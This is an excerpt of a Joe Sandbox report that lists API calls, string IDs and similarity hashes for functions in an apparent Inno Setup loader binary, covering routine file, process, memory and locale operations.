                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                        • API String ID: 3586484885-3001827809
                                                                                                                                        • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                        • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                                                        • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                        • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000), ref: 00409A70
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8), ref: 00409AA4
                                                                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020724E0), ref: 0040966C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                        • String ID: D
                                                                                                                                        • API String ID: 3356880605-2746444292
                                                                                                                                        • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                        • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                                                        • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                        • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 730355536-0
                                                                                                                                        • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                        • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                        • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                        • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: .tmp$y@
                                                                                                                                        • API String ID: 2030045667-2396523267
                                                                                                                                        • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                        • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                                                        • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                        • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: .tmp$y@
                                                                                                                                        • API String ID: 2030045667-2396523267
                                                                                                                                        • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                        • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                                                        • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                        • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID: .tmp
                                                                                                                                        • API String ID: 1375471231-2986845003
                                                                                                                                        • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                        • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                                                        • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                                                        • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                        • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                                                        • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                                                        • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                                                                        Control-flow Graph

APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
  • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
  • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
  • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
  • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
• String ID:
• API String ID: 296031713-0
• Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
• Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

Control-flow Graph (rendered image; legend: Executed / Not Executed)
Single basic block 406fa0-406ff3: SetErrorMode, call 403414, LoadLibraryA
APIs
• SetErrorMode.KERNEL32(00008000), ref: 00406FAA
• LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
• Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
• GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
• Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

Control-flow Graph (rendered image; legend: Executed / Not Executed)
Basic blocks 40762c to 40766a: ReadFile, then GetLastError and call 40748c on the error path
APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
• Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
• Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
• Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
  • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
• Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
• Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
• Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
• Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
• Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
• Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
• Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
• Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
• Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
• Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
APIs
• SetEndOfFile.KERNEL32(?,02087FF4,0040AA59,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
• Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
